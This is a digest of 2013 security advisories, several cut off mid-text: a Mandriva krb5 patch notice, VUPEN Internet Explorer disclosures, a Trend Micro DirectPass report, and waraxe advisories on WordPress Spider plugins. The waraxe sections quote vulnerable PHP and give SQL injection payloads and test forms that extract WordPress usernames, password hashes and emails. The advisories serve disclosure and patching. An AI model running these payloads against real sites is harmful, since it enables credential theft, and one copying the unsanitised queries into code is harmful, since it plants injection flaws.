[ MDVSA-2013:166 ] krb5

[security]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

 ___

 Mandriva Linux Security Advisory MDVSA-2013:166
 http://www.mandriva.com/en/support/security/
 ___

 Package : krb5
 Date: May 21, 2013
 Affected: Business Server 1.0, Enterprise Server 5.0
 ___

 Problem Description:

 A vulnerability has been discovered and corrected in krb5:
 
 The kpasswd service provided by kadmind was vulnerable to a UDP
 ping-pong attack (CVE-2002-2443).
 
 The updated packages have been patched to correct this issue.
 ___

 References:

 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-2443
 https://bugzilla.redhat.com/show_bug.cgi?id=962531
 ___

 Updated Packages:

 Mandriva Enterprise Server 5:
 762c01ff4ce813cd3c5acce794c29aa3  mes5/i586/krb5-1.8.1-0.11mdvmes5.2.i586.rpm
 415beef49e20f8b89c84b0270afbf1d6  
mes5/i586/krb5-pkinit-openssl-1.8.1-0.11mdvmes5.2.i586.rpm
 a6bd6778ab49710b1a50633555b0dc27  
mes5/i586/krb5-server-1.8.1-0.11mdvmes5.2.i586.rpm
 497cfca620c25dd7ce523a61afdccc5e  
mes5/i586/krb5-server-ldap-1.8.1-0.11mdvmes5.2.i586.rpm
 2fe4670b52795e8c74f53e7eee826c2c  
mes5/i586/krb5-workstation-1.8.1-0.11mdvmes5.2.i586.rpm
 22926f634ea6ba5f816c14a2e30cc38a  
mes5/i586/libkrb53-1.8.1-0.11mdvmes5.2.i586.rpm
 477f8f61cd9c8e577cd6797e850978ce  
mes5/i586/libkrb53-devel-1.8.1-0.11mdvmes5.2.i586.rpm 
 77c66246600b71f6471f75054e886cd4  mes5/SRPMS/krb5-1.8.1-0.11mdvmes5.2.src.rpm

 Mandriva Enterprise Server 5/X86_64:
 1cab52ff4c719378b97ec3acbc7d911f  
mes5/x86_64/krb5-1.8.1-0.11mdvmes5.2.x86_64.rpm
 b5d51d32e5eaa96ab973e5ce151a5254  
mes5/x86_64/krb5-pkinit-openssl-1.8.1-0.11mdvmes5.2.x86_64.rpm
 6218fc79250aaec5c7ca19b193fdb8dc  
mes5/x86_64/krb5-server-1.8.1-0.11mdvmes5.2.x86_64.rpm
 88de99aa8cde8adaee672c265292a355  
mes5/x86_64/krb5-server-ldap-1.8.1-0.11mdvmes5.2.x86_64.rpm
 39791a90573b4de08efdaf0193bbc5dc  
mes5/x86_64/krb5-workstation-1.8.1-0.11mdvmes5.2.x86_64.rpm
 846b75578bb5559cfcf7aa2ce9e43156  
mes5/x86_64/lib64krb53-1.8.1-0.11mdvmes5.2.x86_64.rpm
 7351a8d2be13df25ab9c2534489a2da0  
mes5/x86_64/lib64krb53-devel-1.8.1-0.11mdvmes5.2.x86_64.rpm 
 77c66246600b71f6471f75054e886cd4  mes5/SRPMS/krb5-1.8.1-0.11mdvmes5.2.src.rpm

 Mandriva Business Server 1/X86_64:
 3150d604a21be2373d223457da156734  mbs1/x86_64/krb5-1.9.2-3.3.mbs1.x86_64.rpm
 52729f0759e686cfdf5f9c99efc28862  
mbs1/x86_64/krb5-pkinit-openssl-1.9.2-3.3.mbs1.x86_64.rpm
 4b997282ad6dd76eb7a10f07809bef71  
mbs1/x86_64/krb5-server-1.9.2-3.3.mbs1.x86_64.rpm
 b10b3c0211e071ab93e818db684098f9  
mbs1/x86_64/krb5-server-ldap-1.9.2-3.3.mbs1.x86_64.rpm
 417d23306554b1d7d290e8d3fed1a2d8  
mbs1/x86_64/krb5-workstation-1.9.2-3.3.mbs1.x86_64.rpm
 a17c8e2438c0415c9ea478bcc0715101  
mbs1/x86_64/lib64krb53-1.9.2-3.3.mbs1.x86_64.rpm
 2d05c4ac4b44be10ea1e3d4337689512  
mbs1/x86_64/lib64krb53-devel-1.9.2-3.3.mbs1.x86_64.rpm 
 95305e2323d63546e970538b7d692447  mbs1/SRPMS/krb5-1.9.2-3.3.mbs1.src.rpm
 ___

 To upgrade automatically use MandrivaUpdate or urpmi.  The verification
 of md5 checksums and GPG signatures is performed automatically for you.

 All packages are signed by Mandriva for security.  You can obtain the
 GPG public key of the Mandriva Security Team by executing:

  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

 You can view other update advisories for Mandriva Linux at:

  http://www.mandriva.com/en/support/security/advisories/

 If you want to report vulnerabilities, please contact

  security_(at)_mandriva.com
 ___

 Type Bits/KeyID Date   User ID
 pub  1024D/22458A98 2000-07-10 Mandriva Security Team
  security*mandriva.com
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.12 (GNU/Linux)

iD8DBQFRm3ZlmqjQ0CJFipgRAmRWAJ42vFSB5f9jXtt3hRarBQpqxARd/ACfa9qv
esFWMrXe/0P1/wv2ag87c6w=
=Lg3K
-END PGP SIGNATURE-

VUPEN Security Research - Microsoft Internet Explorer 10-9-8-7-6 VML Remote Integer Overflow (MS13-037 / Pwn2Own)

[VUPEN Security Research]

VUPEN Security Research - Microsoft Internet Explorer 10-9-8-7-6 VML
Remote Integer Overflow (MS13-037 / Pwn2Own)

Website : http://www.vupen.com

Twitter : http://twitter.com/vupen


I. BACKGROUND
-

Microsoft Internet Explorer is a web browser developed by Microsoft and
included as part of the Microsoft Windows line of operating systems with
more than 60% of the worldwide usage share of web browsers. (Wikipedia)


II. DESCRIPTION
-

VUPEN Vulnerability Research Team discovered a critical vulnerability
in Microsoft Internet Explorer.

The vulnerability is caused by an integer overflow error in the vml.dll
component when processing certain undocumented vector graphic properties,
which could be exploited by remote attackers to leak arbitrary memory and
compromise a vulnerable system via a malicious web page.

CVE: CVE-2013-2551


III. AFFECTED PRODUCTS
---

Microsoft Internet Explorer 10
Microsoft Internet Explorer 9
Microsoft Internet Explorer 8
Microsoft Internet Explorer 7
Microsoft Internet Explorer 6

Microsoft Windows RT
Microsoft Windows 8 for 32-bit Systems
Microsoft Windows 8 for x64-based Systems
Microsoft Windows Server 2012
Microsoft Windows 7 for 32-bit Systems
Microsoft Windows 7 for 32-bit Systems Service Pack 1
Microsoft Windows 7 for x64-based Systems
Microsoft Windows 7 for x64-based Systems Service Pack 1
Microsoft Windows Server 2008 for 32-bit Systems
Microsoft Windows Server 2008 for 32-bit Systems Service Pack 2
Microsoft Windows Server 2008 for x64-based Systems
Microsoft Windows Server 2008 for x64-based Systems Service Pack 2
Microsoft Windows Server 2008 for Itanium-based Systems
Microsoft Windows Server 2008 for Itanium-based Systems Service Pack 2
Microsoft Windows Server 2008 R2 for x64-based Systems
Microsoft Windows Server 2008 R2 for x64-based Systems Service Pack 1
Microsoft Windows Server 2008 R2 for Itanium-based Systems
Microsoft Windows Server 2008 R2 for Itanium-based Systems Service Pack 1
Microsoft Windows Vista Service Pack 1
Microsoft Windows Vista Service Pack 2
Microsoft Windows Vista x64 Edition Service Pack 1
Microsoft Windows Vista x64 Edition Service Pack 2
Microsoft Windows Server 2003 Service Pack 2
Microsoft Windows Server 2003 x64 Edition Service Pack 2
Microsoft Windows Server 2003 with SP2 for Itanium-based Systems
Microsoft Windows XP Service Pack 3
Microsoft Windows XP Professional x64 Edition Service Pack 2


IV. Binary Analysis  Exploits/PoCs
---

In-depth technical analysis of the vulnerability and a fully functional
remote code execution exploit will be available through the VUPEN BAE
(Binary Analysis  Exploits) portal:

http://www.vupen.com/english/services/ba-index.php

VUPEN Binary Analysis  Exploits Service provides private exploits and
in-depth technical analysis of the most significant public vulnerabilities
based on disassembly, reverse engineering, protocol analysis, and code
audit.

The service allows governments and major corporations to evaluate risks, and
protect infrastructures and assets against new threats. The service also
allows security vendors (IPS, IDS, AntiVirus) to supplement their internal
research efforts and quickly develop both vulnerability-based and
exploit-based signatures to proactively protect their customers from attacks
and emerging threats.


V. VUPEN Threat Protection Program
---

Governments and major corporations which are members of the VUPEN Threat
Protection Program (TPP) have been proactively alerted about the
vulnerability
when it was discovered by VUPEN in advance of its public disclosure, and
have received a detailed attack detection guidance to protect national and
critical infrastructures against potential 0-day attacks exploiting this
vulnerability:

http://www.vupen.com/english/services/tpp-index.php


VI. SOLUTION


Apply MS13-037 security updates.


VII. CREDIT
--

This vulnerability was discovered by Nicolas Joly of VUPEN Security


VIII. ABOUT VUPEN Security
---

VUPEN is the leading provider of defensive and offensive cybersecurity
intelligence and advanced vulnerability research. VUPEN solutions enable
corporations and governments to manage risks, and protect critical networks
and infrastructures against known and unknown vulnerabilities.

VUPEN solutions include:

* VUPEN Binary Analysis  Exploits Service (BAE) :
http://www.vupen.com/english/services/ba-index.php

* VUPEN Threat Protection Program (TPP) :
http://www.vupen.com/english/services/tpp-index.php


IX. REFERENCES
--

http://technet.microsoft.com/en-us/security/bulletin/ms13-037
http://www.vupen.com/english/research.php


X. DISCLOSURE TIMELINE
-

2011-11-09 - Vulnerability Discovered by VUPEN
2013-03-06 - Vulnerability Reported to Microsoft During Pwn2Own 2013
2013-05-20 - Public disclosure

VUPEN Security Research - Microsoft Internet Explorer 10-9 Object Confusion Sandbox Bypass (MS13-037 / Pwn2Own)

[VUPEN Security Research]

VUPEN Security Research - Microsoft Internet Explorer 10-9 Object
Confusion Sandbox Bypass (MS13-037 / Pwn2Own)

Website : http://www.vupen.com

Twitter : http://twitter.com/vupen


I. BACKGROUND
-

Microsoft Internet Explorer is a web browser developed by Microsoft and
included as part of the Microsoft Windows line of operating systems with
more than 60% of the worldwide usage share of web browsers. (Wikipedia)


II. DESCRIPTION
-

VUPEN Vulnerability Research Team discovered a critical vulnerability
in Microsoft Internet Explorer.

The vulnerability is caused by an object confusion error in the IE broker
process when processing unexpected variant objects, which could allow an
attacker to execute arbitrary code within the context of the broker process
to bypass Internet Explorer Protected Mode sandbox.


III. AFFECTED PRODUCTS
---

Microsoft Internet Explorer 10
Microsoft Internet Explorer 9

Microsoft Windows RT
Microsoft Windows 8 for 32-bit Systems
Microsoft Windows 8 for x64-based Systems
Microsoft Windows Server 2012
Microsoft Windows 7 for 32-bit Systems
Microsoft Windows 7 for 32-bit Systems Service Pack 1
Microsoft Windows 7 for x64-based Systems
Microsoft Windows 7 for x64-based Systems Service Pack 1
Microsoft Windows Server 2008 for 32-bit Systems
Microsoft Windows Server 2008 for 32-bit Systems Service Pack 2
Microsoft Windows Server 2008 for x64-based Systems
Microsoft Windows Server 2008 for x64-based Systems Service Pack 2
Microsoft Windows Server 2008 for Itanium-based Systems
Microsoft Windows Server 2008 for Itanium-based Systems Service Pack 2
Microsoft Windows Server 2008 R2 for x64-based Systems
Microsoft Windows Server 2008 R2 for x64-based Systems Service Pack 1
Microsoft Windows Server 2008 R2 for Itanium-based Systems
Microsoft Windows Server 2008 R2 for Itanium-based Systems Service Pack 1
Microsoft Windows Vista Service Pack 1
Microsoft Windows Vista Service Pack 2
Microsoft Windows Vista x64 Edition Service Pack 1
Microsoft Windows Vista x64 Edition Service Pack 2


IV. Binary Analysis  Exploits/PoCs
---

In-depth technical analysis of the vulnerability and a fully functional
remote code execution exploit will be available through the VUPEN BAE
(Binary Analysis  Exploits) portal:

http://www.vupen.com/english/services/ba-index.php

VUPEN Binary Analysis  Exploits Service provides private exploits and
in-depth technical analysis of the most significant public vulnerabilities
based on disassembly, reverse engineering, protocol analysis, and code
audit.

The service allows governments and major corporations to evaluate risks, and
protect infrastructures and assets against new threats. The service also
allows security vendors (IPS, IDS, AntiVirus) to supplement their internal
research efforts and quickly develop both vulnerability-based and
exploit-based signatures to proactively protect their customers from attacks
and emerging threats.


V. VUPEN Threat Protection Program
---

Governments and major corporations which are members of the VUPEN Threat
Protection Program (TPP) have been proactively alerted about the
vulnerability
when it was discovered by VUPEN in advance of its public disclosure, and
have received a detailed attack detection guidance to protect national and
critical infrastructures against potential 0-day attacks exploiting this
vulnerability:

http://www.vupen.com/english/services/tpp-index.php


VI. SOLUTION


Apply MS13-037 security updates.


VII. CREDIT
--

This vulnerability was discovered by Nicolas Joly of VUPEN Security


VIII. ABOUT VUPEN Security
---

VUPEN is the leading provider of defensive and offensive cybersecurity
intelligence and advanced vulnerability research. VUPEN solutions enable
corporations and governments to manage risks, and protect critical networks
and infrastructures against known and unknown vulnerabilities.

VUPEN solutions include:

* VUPEN Binary Analysis  Exploits Service (BAE) :
http://www.vupen.com/english/services/ba-index.php

* VUPEN Threat Protection Program (TPP) :
http://www.vupen.com/english/services/tpp-index.php


IX. REFERENCES
--

http://technet.microsoft.com/en-us/security/bulletin/ms13-037
http://www.vupen.com/english/research.php


X. DISCLOSURE TIMELINE
-

2011-11-23 - Vulnerability Discovered by VUPEN
2013-03-06 - Vulnerability Reported to Microsoft During Pwn2Own 2013
2013-05-20 - Public disclosure

Trend Micro DirectPass 1.5.0.1060 - Multiple Vulnerabilities

[Vulnerability Lab]

Title:
==
Trend Micro DirectPass 1.5.0.1060 - Multiple Vulnerabilities


Date:
=
2013-05-21


References:
===
http://www.vulnerability-lab.com/get_content.php?id=894

Article: http://www.vulnerability-lab.com/dev/?p=580

Trend Micro (Reference): 
http://esupport.trendmicro.com/solution/en-US/1096805.aspx
Trend Micro Solution ID: 1096805

Video: http://www.vulnerability-lab.com/get_content.php?id=951


VL-ID:
=
894


Common Vulnerability Scoring System:

6.1


Introduction:
=
Trend Micro™ DirectPass™ manages website passwords and login IDs in one secure 
location, so you only need to 
remember one password. Other features include: Keystroke encryption, secure 
password generation, automatic 
form-filling, confidential notes, and a secure browser.

Convenience - You can securely and easily manage passwords for numerous online 
accounts with just one 
password and automatically login to your websites with one click. More Security 
- You get an extra layer of 
online security with a specially designed browser for online banking and 
financial websites and protection 
from keylogging malware. No Hassles – You don’t have to be technical wizard to 
benefit from this password 
service, it’s simple to use. Confidence – You can have peace-of-mind using a 
password service provided by 
an Internet security provider with 20+ years of experience. All Your Devices – 
You can use DirectPass 
password manager on Windows PCs, Android mobile, Android Tablet, iPads and 
iPhones, and all devices are 
automatically encrypted and synchronized using the cloud

(Copy of the Vendor Homepage: 
http://www.trendmicro.com/us/home/products/directpass/index.html )


Abstract:
=
The Vulnerability Laboratory Research Team discovered multiple software 
vulnerabilities in the official Trend Micro DirectPass v1.5.0.1060 Software.


Report-Timeline:

2013-03-08: Researcher Notification  Coordination (Benjamin Kunz Mejri)
2013-03-09: Vendor Notification (Trend Micro - Security Team)
2013-03-16: Vendor Response/Feedback (Trend Micro - Karen M.)
2013-05-09: Vendor Fix/Patch (Trend Micro - Active Update Server)
2013-05-15: Vendor Fix/Patch (Trend Micro - Solution ID  Announcement)
2013-05-21: Public Disclosure (Vulnerability Laboratory)


Status:

Published


Affected Products:
==
Trend Micro
Product: DirectPass 1.5.0.1060


Exploitation-Technique:
===
Local


Severity:
=
High


Details:

1.1
A local command injection vulnerability is detected in the official Trend Micro 
DirectPass v1.5.0.1060 Software.
The vulnerability allows local low privileged system user accounts to inject 
system specific commands or local 
path requests to compromise the software.

The vulnerability is located in the direct-pass master password setup module of 
the Trend Micro InstallWorkspace.exe file.
The master password module of the software allows users to review the included 
password in the secound step for security 
reason. The hidden protected master password will only be visible in the check 
module when the customer is processing to 
mouse-over onto the censored password field. When the software is processing to 
display the hidden password in plain the 
command/path injection will be executed out of the not parsed master password 
context in in the field listing.

Exploitation of the vulnerability requires a low privilege system user account 
with direct-pass access and low or medium 
user interaction. Successful exploitation of the vulnerability results in 
software and system process compromise or 
execution of local system specific commands/path.

Vulnerable File(s):
[+] InstallWorkspace.exe

Vulnerable Module(s):
[+] Setup Master Password

Vulnerable Parameter(s):
[+] Master Password

Affected Module(s):
[+] Check Listing (Master Password)


1.2
A persistent input validation vulnerability is detected in the official Trend 
Micro DirectPass v1.5.0.1060 Software.
The bug allows local attackers with low privileged system user account to 
implement/inject malicious script code on 
application side (persistent) of the software.

The persistent web vulnerability is located in the direct-pass check module 
when processing to list a manipulated master password. 
In step one injects a malicious iframe in the hidden fields as master password. 
The inserted context will be saved and the execution 
will be in the next step when processing to list the master password context in 
the last check module. To bypass the validation the 
and execute the injected script code the attacker needs to split (%20) the 
input request.

Exploitation of the vulnerability requires medium user interaction and a low 
privilege system user account with direct-pass.
Successful exploitation 

[waraxe-2013-SA#104] - Multiple Vulnerabilities in Spider Event Calendar Wordpress Plugin

[come2waraxe]

[waraxe-2013-SA#104] - Multiple Vulnerabilities in Spider Event Calendar 
Wordpress Plugin
===

Author: Janek Vind waraxe
Date: 22. May 2013
Location: Estonia, Tartu
Web: http://www.waraxe.us/advisory-104.html


Description of vulnerable software:
~~~

Spider Event Calendar is a highly configurable plugin which allows you
to have multiple organized events in a calendar. This plugin is one of
the best WordPress Calendar available in WordPress Directory. If you
have problem with organizing your WordPress Calendar events and displaying
them in a calendar format, then Spider WordPress Calendar Plugin is the
best solution.

http://wordpress.org/extend/plugins/spider-event-calendar/
http://web-dorado.com/products/wordpress-calendar.html

Vulnerable is current version 1.3.0, older versions not tested.


###
1. Insufficient access check for AJAX operations in calendar.php
###

Reason:
1. weak access control implementation
Preconditions:
1. must be logged in as Wordpress user
Impact:
1. Any Wordpress user can edit Spider Calendar

Php script calendar.php line 197:
[ source code start ]--
add_action('wp_ajax_spidercalendarinlineedit', 'spider_calendar_quick_edit');

add_action('wp_ajax_spidercalendarinlineupdate', 
'spider_calendar_quick_update');
function spider_calendar_quick_update(){

global $wpdb;

if(isset($_POST['calendar_id'])  isset($_POST['calendar_title'])  
isset($_POST['us_12_format_sp_calendar'])){
$wpdb-update(
..
function spider_calendar_quick_edit(){
global $wpdb;
if(isset($_POST['calendar_id'])){
$row=$wpdb-get_row(
[ source code end ]

We can see, that AJAX actions wp_ajax_spidercalendarinlineedit and
wp_ajax_spidercalendarinlineupdate are bound to functions 
spider_calendar_quick_edit
and spider_calendar_quick_update. This two functions are meant to be used only
by admin, but there is nothing to stop low privileged users. Even users with
Subscriber access level can use those two AJAX functions. 

Test:

htmlbodycenter
form 
action=http://localhost/wp351/wp-admin/admin-ajax.php?action=spidercalendarinlineedit;
 method=post
input type=hidden name=calendar_id value=1
input type=submit value=Test
/form
/center/body/html

Result: calendar editing form will be shown

Remark: This weakness in access control makes next two SQL injection 
vulnerabilities
much more critical - there is no need for admin privileges, even low level
Wordpress user is able to exploit these vulnerabilities.


###
2. SQL Injection in calendar.php function spider_calendar_quick_update
###

Reason:
1. insufficient sanitization of user-supplied data
Attack vector:
1. user-supplied POST parameter calendar_id
Preconditions:
1. must be logged in as Wordpress user


Php script calendar.php line 199:
[ source code start ]--
add_action('wp_ajax_spidercalendarinlineupdate', 
'spider_calendar_quick_update');
function spider_calendar_quick_update(){

global $wpdb;

if(isset($_POST['calendar_id'])  isset($_POST['calendar_title'])  
isset($_POST['us_12_format_sp_calendar'])){
..
$row=$wpdb-get_row(SELECT * FROM 
.$wpdb-prefix.spidercalendar_calendar
WHERE id=.$_POST['calendar_id']);
[ source code end ]

As seen above, user-supplied POST parameter calendar_id is used in SQL query
without any sanitization, resulting in SQL injection vulnerability.

Test:

htmlbodycenter
form 
action=http://localhost/wp351/wp-admin/admin-ajax.php?action=spidercalendarinlineupdate;
 method=post
input type=hidden name=calendar_title value=1
input type=hidden name=us_12_format_sp_calendar value=2
input type=hidden name=calendar_id value=0 UNION SELECT 1,(SELECT 
CONCAT_WS(0x3a,user_login,user_pass,user_email)FROM wp_users WHERE 
ID=1),3,4,5,6,7
input type=submit value=Test
/form
/center/body/html

Result: in case of success it will be revealed sensitive information about
Wordpress user with ID 1: username, password hash and email.


###
3. SQL Injection in calendar.php function spider_calendar_quick_edit
###

Reason:
1. insufficient sanitization of user-supplied data
Attack vector:
1. 

[waraxe-2013-SA#105] - Multiple Vulnerabilities in Spider Catalog Wordpress Plugin

[come2waraxe]

[waraxe-2013-SA#105] - Multiple Vulnerabilities in Spider Catalog Wordpress 
Plugin
===

Author: Janek Vind waraxe
Date: 22. May 2013
Location: Estonia, Tartu
Web: http://www.waraxe.us/advisory-105.html


Description of vulnerable software:
~~~

Spider Catalog is the best WordPress catalog plugin. It is a convenient tool
for organizing the products represented on your website into catalogs. Each
product on the catalog is assigned with a relevant category, which makes it
easier for the customers to search and identify the needed products within the
catalog.

http://wordpress.org/extend/plugins/catalog/
http://web-dorado.com/products/wordpress-catalog.html

Vulnerable is current version 1.4.6, older versions not tested.


###
1. SQL Injection in Spider Catalog Shortcodes
###

Reason:
  1. insufficient sanitization of user-supplied data
Attack vector:
  1. user-supplied shortcode parameter id
Preconditions:
  1. must be logged in as user with posting privileges (Author level
  required as minimum by default)


Php script catalog.php line 101:
[ source code start ]--
add_shortcode('Spider_Catalog_Category', 
'Spider_Catalog_Products_list_shotrcode');

function Spider_Catalog_Single_product_shotrcode($atts) {
 extract(shortcode_atts(array(
  'id' = '',
 ), $atts));
 return spider_cat_Single_product($id);
}
add_shortcode('Spider_Catalog_Product', 
'Spider_Catalog_Single_product_shotrcode');
..
function spider_cat_Single_product($id)
{
..
  returnfront_end_single_product($id);
[ source code end ]

We can see, that two shortcodes are defined: Spider_Catalog_Category and
Spider_Catalog_Product. Both of them have SQL Injection vulnerability via
shortcode parameter id.
Let's analyze shortcode Spider_Catalog_Product implementation.
Parameter id from shortcode Spider_Catalog_Product will be used in function
front_end_single_product() as argument.

Php script front_end_functions.php line 18:
[ source code start ]--
function front_end_single_product($id)
{
..
 $product_id=$id;
..
 $query = SELECT .$wpdb-prefix.spidercatalog_products.*, 
   .$wpdb-prefix.spidercatalog_product_categories.name as cat_name FROM 
   .$wpdb-prefix.spidercatalog_products left join 
   .$wpdb-prefix.spidercatalog_product_categories on  
   .$wpdb-prefix.spidercatalog_products.category_id=
   .$wpdb-prefix.spidercatalog_product_categories.id where
   .$wpdb-prefix.spidercatalog_products.id='.$product_id.' and 
   .$wpdb-prefix.spidercatalog_products.published = '1' ;
 $rows = $wpdb-get_results($query);
[ source code end ]

As seen above, parameter id is used in SQL query without any sanitization,
which leads to SQL Injection vulnerability.

Tests:

Log in as user with posting privileges and use shortcode as below:

[Spider_Catalog_Product id=0' UNION SELECT 
1,2,3,@@version,5,6,7,8,9,10,11,12#]

Now open webpage containing specific post and MySQL version info will be 
revealed.

Second test:

[Spider_Catalog_Product id=0' UNION SELECT 1,2,3,(SELECT 
CONCAT_WS(0x3a,user_login,user_pass)FROM wp_users WHERE 
ID=1),5,6,7,8,9,10,11,12#]

As result, sensitive information (username and hashed password) will be revealed
for Wordpress user with ID 1 (usually admin).

SQL Injection in other shortcode can be exploited in similar way:

[Spider_Catalog_Category id=0 UNION SELECT 1,2,@@version,4,5,6,7,8#]

.. and we can see MySQL version info (look at the html source code):

a style=cursor:pointer; onclick=catt_idd_1(5.5.30) Back to Catalog


###
2. SQL Injection in catalog.php function catalog_after_search_results()
###

Reason:
  1. insufficient sanitization of user-supplied data
Attack vector:
  1. user-supplied parameter s
Preconditions: none


Php script catalog.php line 39:
[ source code start ]--
function catalog_after_search_results($query){
global $wpdb;
if(isset($_REQUEST['s'])  $_REQUEST['s']){
$serch_word=htmlspecialchars(stripslashes($_REQUEST['s']));
$query=str_replace($wpdb-prefix.posts.post_content,
  
gen_string_catalog_search($serch_word,$wpdb-prefix.'posts.post_content')
  . .$wpdb-prefix.posts.post_content,$query);
}   
return $query;

}
add_filter( 'posts_request', 'catalog_after_search_results');